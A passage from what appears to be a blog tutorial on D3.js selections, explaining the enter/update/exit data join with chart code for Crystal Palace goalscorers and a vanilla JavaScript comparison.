&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;svg&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;append&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;g&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;selectAll&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;rect&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;cpfcGoalscorers202425&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;rect&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fill&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token 
punctuation&quot;&gt;.&lt;/span&gt;color&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;x&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;y&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token 
string&quot;&gt;&quot;width&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; barWidth&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;height&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;height&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On such a basic chart, there&#39;s not too much difference between the two. But the D3 API allows you to also consider a couple of extra states for your data:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;What happens when new data has to enter the DOM, or old and unneeded DOM elements need to exit?&lt;/li&gt;
&lt;li&gt;If you&#39;ve got a lot of complex data, how do you link your source data to your DOM elements?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Let&#39;s go back to our goalscorers chart. We can turn it into an animated chart which shows cumulative total goals for Crystal Palace players across the 38 matches in the 2024/25 season:&lt;/p&gt;
&lt;bar-race class=&quot;breakout&quot;&gt;
&lt;/bar-race&gt;
&lt;p&gt;This feels like a more complex arrangement but, as far as the DOM is concerned, this is still essentially the same as what we had before: an &lt;code&gt;&amp;lt;svg&amp;gt;&lt;/code&gt; with a bunch of &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; elements. The primary difference is the data - there&#39;s more of it, it changes, and we&#39;re using it in a more complex way. To achieve this with the vanilla Web APIs, we&#39;d need to start taking on more complicated-sounding work. Chiefly:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Identifying when data has changed&lt;/li&gt;
&lt;li&gt;Knowing which DOM element corresponds to which datum&lt;/li&gt;
&lt;li&gt;What to do when new data turns up&lt;/li&gt;
&lt;/ul&gt;
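&lt;p&gt;As a rough sketch of what that bookkeeping might look like by hand, here&#39;s one way to do it with the vanilla Web APIs. The &lt;code&gt;updateBars&lt;/code&gt; helper, the &lt;code&gt;barsByPlayer&lt;/code&gt; map and the &lt;code&gt;scales&lt;/code&gt; object are all hypothetical names for illustration, not code from the chart above, and it sidesteps change detection by simply rewriting &lt;code&gt;y&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; on every call:&lt;/p&gt;
&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;const SVG_NS = &quot;http://www.w3.org/2000/svg&quot;;

// Hypothetical helper, not part of the chart above.
// g: the parent SVG group element
// data: an array of { player, goals } objects
// barsByPlayer: a Map from player name to rect element, maintained by us
// scales: the x, y, height and colour functions, assumed to be defined elsewhere
function updateBars(g, data, barsByPlayer, scales) {
  data.forEach((d, i) =&gt; {
    let bar = barsByPlayer.get(d.player);

    if (!bar) {
      // New datum: create its rect and remember which player it belongs to.
      bar = document.createElementNS(SVG_NS, &quot;rect&quot;);
      bar.setAttribute(&quot;fill&quot;, scales.colour(d.player));
      bar.setAttribute(&quot;width&quot;, 54);
      bar.setAttribute(&quot;x&quot;, scales.x(i));
      g.appendChild(bar);
      barsByPlayer.set(d.player, bar);
    }

    // New or existing: bring the bar in line with the latest goal tally.
    bar.setAttribute(&quot;y&quot;, scales.y(d.goals));
    bar.setAttribute(&quot;height&quot;, scales.height(d.goals));
  });
}&lt;/code&gt;&lt;/pre&gt;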
&lt;p&gt;Surprise: D3 does all of those things under the hood. In this chart, the code that looks after generating bars is very similar to how it looked before.&lt;/p&gt;
&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;bars&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;data&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;player&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;enter&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt;&lt;br /&gt;      enter&lt;br /&gt;        &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;append&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;rect&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;        &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fill&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token 
parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;colour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;player&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;        &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;width&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;54&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;        &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;x&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; i&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;x&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;i&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;&lt;br /&gt;    &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span 
class=&quot;token parameter&quot;&gt;update&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; update&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;y&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;y&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;height&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;height&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;goals&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;data&lt;/code&gt; method now takes an accessor function to provide a key, which lets D3 associate DOM elements to specific bits of data, and the &lt;code&gt;join&lt;/code&gt; method now takes two functions: &lt;code&gt;enter&lt;/code&gt; and &lt;code&gt;update&lt;/code&gt;. The former creates a new &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; element in the DOM when a player scores their first goal and joins the dataset, and the latter is the identity function. A third function can be provided for &lt;code&gt;exit&lt;/code&gt;, but this isn&#39;t used here.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;y&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; attributes are then set on the merged outputs of the &lt;code&gt;enter&lt;/code&gt; and &lt;code&gt;update&lt;/code&gt; selections, which is the selection that the &lt;code&gt;join&lt;/code&gt; method returns. The &lt;code&gt;x&lt;/code&gt;, &lt;code&gt;y&lt;/code&gt;, &lt;code&gt;colour&lt;/code&gt; and &lt;code&gt;height&lt;/code&gt; functions are defined elsewhere, but these will return the relevant values for each attribute.&lt;/p&gt;
&lt;p&gt;We have now stumbled upon the most sacred D3 concept: the magical data join. You&#39;ll often see it visualised as a Venn diagram:&lt;/p&gt;
&lt;svg width=&quot;100%&quot; style=&quot;max-height:400px;font-size:var(--size-six);font-family:Source Code Pro,Monospace;isolation:isolate&quot; viewBox=&quot;0 0 450 300&quot;&gt;
  &lt;text x=&quot;160&quot; y=&quot;16&quot; text-anchor=&quot;middle&quot; style=&quot;fill:var(--text)&quot;&gt;Data&lt;/text&gt;
  &lt;text x=&quot;290&quot; y=&quot;16&quot; text-anchor=&quot;middle&quot; style=&quot;fill:var(--text)&quot;&gt;Elements&lt;/text&gt;
  &lt;circle cx=&quot;160&quot; cy=&quot;150&quot; r=&quot;125&quot; style=&quot;fill:var(--aquamarine);&quot;&gt;&lt;/circle&gt;
  &lt;circle cx=&quot;290&quot; cy=&quot;150&quot; r=&quot;125&quot; style=&quot;mix-blend-mode:screen;fill:var(--amaranth-pink);&quot;&gt;&lt;/circle&gt;
  &lt;text x=&quot;100&quot; y=&quot;150&quot; text-anchor=&quot;middle&quot; style=&quot;fill:var(--onyx)&quot;&gt;Enter&lt;/text&gt;
  &lt;text x=&quot;225&quot; y=&quot;150&quot; text-anchor=&quot;middle&quot; style=&quot;fill:var(--onyx)&quot;&gt;Update&lt;/text&gt;
  &lt;text x=&quot;350&quot; y=&quot;150&quot; text-anchor=&quot;middle&quot; style=&quot;fill:var(--onyx)&quot;&gt;Exit&lt;/text&gt;
&lt;/svg&gt;
&lt;p&gt;Which is a nice representation for the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Data not bound to elements are sent to the &lt;code&gt;enter&lt;/code&gt; function&lt;/li&gt;
&lt;li&gt;Data already bound to elements are sent to the &lt;code&gt;update&lt;/code&gt; function&lt;/li&gt;
&lt;li&gt;Elements not bound to data are sent to the &lt;code&gt;exit&lt;/code&gt; function&lt;/li&gt;
&lt;/ul&gt;
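&lt;p&gt;The three rules above can be sketched without D3 at all. This is a minimal illustration, not how D3 implements the join: &lt;code&gt;partitionJoin&lt;/code&gt;, the player names and the idea of tracking elements purely by key are all assumptions made for the example.&lt;/p&gt;

```javascript
// Hypothetical helper: split a keyed data join into its three states.
// `bound` holds the keys already attached to elements; `data` is the new array.
function partitionJoin(bound, data, key) {
  const boundKeys = new Set(bound);
  const dataKeys = new Set(data.map(key));

  return {
    // Data with no matching element yet
    enter: data.filter(function (d) { return !boundKeys.has(key(d)); }),
    // Data that already has an element
    update: data.filter(function (d) { return boundKeys.has(key(d)); }),
    // Elements whose data has gone away
    exit: bound.filter(function (k) { return !dataKeys.has(k); }),
  };
}

const onScreen = ["Ada", "Grace"]; // keys of elements already in the DOM
const nextData = [
  { player: "Grace", goals: 3 },
  { player: "Linus", goals: 1 },
];

const states = partitionJoin(onScreen, nextData, function (d) { return d.player; });

console.log(states.enter.map(function (d) { return d.player; }));  // [ 'Linus' ]
console.log(states.update.map(function (d) { return d.player; })); // [ 'Grace' ]
console.log(states.exit);                                          // [ 'Ada' ]
```

&lt;p&gt;Linus is new data with no element, Grace already has one, and Ada has an element but no data left to back it.&lt;/p&gt;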
&lt;p&gt;With this in mind - and, honestly, it&#39;s a lot - we can start addressing those original pain points.&lt;/p&gt;
&lt;h2 id=&quot;why-selectall-elements-that-don&#39;t-exist%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/understanding-d3-selections/#why-selectall-elements-that-don&#39;t-exist%3F&quot;&gt;Why &lt;code&gt;selectAll&lt;/code&gt; elements that don&#39;t exist?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;That&#39;s the data join at work! Let&#39;s revisit our original code:&lt;/p&gt;
&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;svg&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;selectAll&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;circleData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;join&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;circle&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cx&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;cy&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;y&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;r&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;  &lt;span class=&quot;token parameter&quot;&gt;d&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&gt;&lt;/span&gt; d&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;r&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;attr&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;fill&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;#FBFBFF&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;We can now analyse what&#39;s going on with a bit more D3-specific panache:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;selectAll(&amp;quot;circle&amp;quot;)&lt;/code&gt; returns an empty selection, as there were no &lt;code&gt;&amp;lt;circle&amp;gt;&lt;/code&gt; elements nested inside the &lt;code&gt;&amp;lt;svg&amp;gt;&lt;/code&gt; container.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;data&lt;/code&gt; method binds the array of data to the selection. Three new selections are created under the hood, each representing the enter, update and exit states. These selections can be empty. The update selection is returned; the selection remains aware of the enter and exit states for later use.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;join&lt;/code&gt; method operates on the enter, update and exit selections, passing them as parameters to the associated callback functions.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;selectAll(&amp;quot;circle&amp;quot;)&lt;/code&gt; returned an empty selection, so the update and exit selections are empty. The enter selection callback operates on the supplied data, appending three &lt;code&gt;&amp;lt;circle&amp;gt;&lt;/code&gt; elements to the &lt;code&gt;&amp;lt;svg&amp;gt;&lt;/code&gt; container. The &lt;code&gt;attr&lt;/code&gt; function accepts either a string or a function - if the latter is provided, D3 will pass the individual datum as the first parameter.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;join&lt;/code&gt; method returns a new selection resulting from merging the enter and update selections together.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This might all feel a bit overblown - and, dare I say it, clunky - in the case of displaying static data once in the DOM. But D3&#39;s elegance comes from how it generalises extremely well across cases where there are multiple elements moving through the enter, update and exit states, which is often the case when veering into animated or interactive charts.&lt;/p&gt;
&lt;h2 id=&quot;why-append-a-circle-after-selecting-circles%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/understanding-d3-selections/#why-append-a-circle-after-selecting-circles%3F&quot;&gt;Why &lt;code&gt;append&lt;/code&gt; a circle after selecting circles?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;That&#39;s also the data join at work! The &lt;code&gt;selectAll&lt;/code&gt; grabs the initial selection, but the &lt;code&gt;append&lt;/code&gt; on the enter selection specifically describes &lt;em&gt;what&lt;/em&gt; to do when there is data that&#39;s not bound to an element.&lt;/p&gt;
&lt;p&gt;You &lt;em&gt;could&lt;/em&gt; append a &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; instead, of course. What would happen if you did?&lt;/p&gt;
&lt;p&gt;Returning to the case of static data: nothing weird would happen. You&#39;d get a nice little &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; sitting inside your SVG container. But if you wanted to make something dynamic, well, when you re-ran the &lt;code&gt;selectAll&lt;/code&gt; you would once again receive an empty selection. And once again the bound data would go through the &lt;code&gt;enter&lt;/code&gt; state. And &lt;em&gt;another&lt;/em&gt; beautiful &lt;code&gt;&amp;lt;rect&amp;gt;&lt;/code&gt; would end up, perhaps unexpectedly, inside the SVG.&lt;/p&gt;
&lt;p&gt;Press the button to see that happening:&lt;/p&gt;
&lt;append-rect class=&quot;breakout&quot;&gt;
&lt;/append-rect&gt;
&lt;h2 id=&quot;why-can&#39;t-you-select-an-element-and-join-one-item%3F&quot; tabindex=&quot;-1&quot;&gt;&lt;a class=&quot;header-anchor&quot; href=&quot;https://martingaston.dev/articles/understanding-d3-selections/#why-can&#39;t-you-select-an-element-and-join-one-item%3F&quot;&gt;Why can&#39;t you &lt;code&gt;select&lt;/code&gt; an element and &lt;code&gt;join&lt;/code&gt; &lt;em&gt;one&lt;/em&gt; item?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Technically, you &lt;em&gt;can&lt;/em&gt; if you&#39;re willing to fudge it. Sort of. But you shouldn&#39;t, because it&#39;s not right.&lt;/p&gt;
&lt;p&gt;It mostly comes down to parents.&lt;/p&gt;
&lt;p&gt;But first: semantics. The word &lt;em&gt;data&lt;/em&gt; is an English language hot mess, and is usually used in both its singular and plural forms; the singular would be &lt;em&gt;datum&lt;/em&gt;. Within the realm of D3 we should very much consider it plural. So it wouldn&#39;t really make &lt;em&gt;sense&lt;/em&gt; to try and bind multiple bits of data to a singular selection. In language terms, this is a closed case.&lt;/p&gt;
&lt;p&gt;But... why stop there?&lt;/p&gt;
&lt;p&gt;Within D3, data (plural!) is bound to a selection. A selection is an array of arrays of DOM elements.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;select&lt;/code&gt; and &lt;code&gt;selectAll&lt;/code&gt; both return the same core &lt;code&gt;Selection&lt;/code&gt; object, which contains fields for &lt;code&gt;_groups&lt;/code&gt; and &lt;code&gt;_parents&lt;/code&gt;. Imagine something like this:&lt;/p&gt;
&lt;pre class=&quot;language-javascript&quot;&gt;&lt;code class=&quot;language-javascript&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;export&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;Selection&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;br /&gt;  &lt;span class=&quot;token comment&quot;&gt;// groups of elements, plus one parent per group&lt;/span&gt;&lt;br /&gt;  _groups&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;  _parents&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;  &lt;span class=&quot;token function&quot;&gt;constructor&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;groups&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; parents&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;br 